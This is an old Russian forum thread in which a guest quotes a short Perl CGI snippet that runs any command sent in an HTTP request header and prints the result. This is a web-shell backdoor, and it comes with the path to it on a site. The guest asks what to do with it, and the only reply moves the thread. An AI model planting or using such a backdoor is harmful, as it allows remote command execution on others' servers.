Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Программирование и базы данных » подскажите,что с этим можно сделать

Ответить
Настройки темы
подскажите,что с этим можно сделать

Аватара для Guest

Guest



Профиль | Цитировать


Здравствуйте,уважаемые.
Думаю, этот вопрос больше к тем,кто
разбирается в скриптах.
Есть сайт http://----.com К ниму прилагается  /stats/udata/200112-cdata.udb.cgi и в дополнение дается код
print header;$d = $ENV{"HTTP_ACCEPT_IP"};
$l=`$d 2>&1`; print ($l);
А вот что мне со всем этим добром делать я еще не знаю. Подскажите,пожалуйста,пути решения
этой,может быть для кого-то легкой,
задачи.Заранее безмерно благодарен

Отправлено: 14:54, 25-12-2003

 

Аватара для Prisoner

Engrossed by the Void


Сообщения: 2229
Благодарности: 60

Профиль | Отправить PM | Цитировать


Тема перемещена сюда

-------
Не могу дать более дельный совет - не хватает системных ресурсов...


Отправлено: 02:40, 26-12-2003 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.



Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Программирование и базы данных » подскажите,что с этим можно сделать

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
[решено] Подскажите можно ли такое сделать? Donner Microsoft Windows NT/2000/2003 2 25-03-2009 01:16
Что можно сделать, подскажите Pav-l Разгон, охлаждение и моддинг 10 12-07-2008 08:12
DVD-RW глючит! Что с этим можно сделать? Domovou Непонятные проблемы с Железом 14 06-04-2008 06:46
Разное - материнка+память+проц+БП+видюха, что с этим все можно сделать? Master WEB Прочее железо 8 06-03-2008 19:05
подскажите чего можно сделать из старого железа Lenich Прочее железо 15 21-09-2005 19:42




 
Переход